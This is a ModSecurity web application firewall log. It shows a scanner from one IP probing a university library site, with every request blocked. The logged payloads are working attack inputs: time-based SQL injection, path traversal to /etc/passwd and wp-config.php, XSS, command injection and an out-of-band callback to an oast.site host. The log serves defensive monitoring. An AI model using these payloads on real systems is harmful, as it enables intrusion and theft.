[Tue Aug 29 11:35:34.384598 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAATWYVwAAAAa"]
[Tue Aug 29 11:35:35.329010 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAASEJbkAAAAE"]
[Tue Aug 29 11:35:35.389061 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAUOaYUAAABG"]
[Tue Aug 29 11:36:24.644815 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11yMCo-f0AAAUbg5wAAABQ"]
[Tue Aug 29 11:36:24.763659 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11yMCo-f0AAAUFdg8AAAA9"]
[Tue Aug 29 11:36:25.308535 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ycCo-f0AAAWBBQAAAAAB"]
[Tue Aug 29 11:36:25.541507 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ycCo-f0AAAWPpXIAAAAH"]
[Tue Aug 29 11:36:26.500508 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfeb.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11ysCo-f0AAAWa-UoAAAAI"]
[Tue Aug 29 11:36:28.376135 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAWcCQcAAAAL"]
[Tue Aug 29 11:36:28.443021 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAV9bycAAAAA"]
[Tue Aug 29 11:36:30.373245 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAQSWQ0AAAA0"]
[Tue Aug 29 11:36:32.379770 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAAV9bzYAAAAA"]
[Tue Aug 29 11:36:33.429223 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAASHiDUAAAAD"]
[Tue Aug 29 11:36:33.505043 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110cCo-f0AAASEJe0AAAAE"]
[Tue Aug 29 11:36:33.571107 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAAWx8xwAAAAg"]
[Tue Aug 29 11:36:34.415310 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAWcCR0AAAAL"]
[Tue Aug 29 11:36:36.957959 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAWrxqIAAAAY"]
[Tue Aug 29 11:36:37.365392 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAATQXocAAAAO"]
[Tue Aug 29 11:36:37.416569 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAATQXokAAAAO"]
[Tue Aug 29 11:36:38.364898 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWqup0AAAAX"]
[Tue Aug 29 11:36:39.504687 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26ggno93zboiu5yb.oast.site found within TX:1: cjmnbitjmimt14dgn26ggno93zboiu5yb.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAWexkoAAAAP"]
[Tue Aug 29 11:36:41.428536 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAWx80YAAAAg"]
[Tue Aug 29 11:36:41.447025 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAWx80cAAAAg"]
[Tue Aug 29 11:36:42.359610 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAWquqYAAAAX"]
[Tue Aug 29 11:36:43.429077 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:idusuario: '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO1128Co-f0AAAN5YMMAAAAN"]
[Tue Aug 29 11:36:44.371547 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:idusuario. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '' found within ARGS:idusuario: ''"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/controller/login.php"] [unique_id "ZO113MCo-f0AAAWvFCsAAAAa"]
[Tue Aug 29 11:36:49.493885 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pdf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:pdf: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/report/download.php"] [unique_id "ZO114cCo-f0AAAQSWTkAAAA0"]
[Tue Aug 29 11:36:56.558750 2023] [:error] [pid 1408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:filename: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZO116MCo-f0AAAWAguEAAAAG"]
[Tue Aug 29 11:36:57.501704 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x22@ found within ARGS:login: \\x22<svg/onload=alert(document.domain)>\\x22@gmail.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO116cCo-f0AAAWnjosAAAAT"]
[Tue Aug 29 11:37:07.807990 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/download.php"] [unique_id "ZO1188Co-f0AAAW9IRUAAAAI"]
[Tue Aug 29 11:37:09.503019 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO119cCo-f0AAATfd-4AAAAk"]
[Tue Aug 29 11:37:16.521048 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAWuq90AAAAZ"]
[Tue Aug 29 11:37:16.556505 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAXA9W8AAAAO"]
[Tue Aug 29 11:37:16.577088 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAUbhK8AAABQ"]
[Tue Aug 29 11:37:27.425286 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAV9b90AAAAA"]
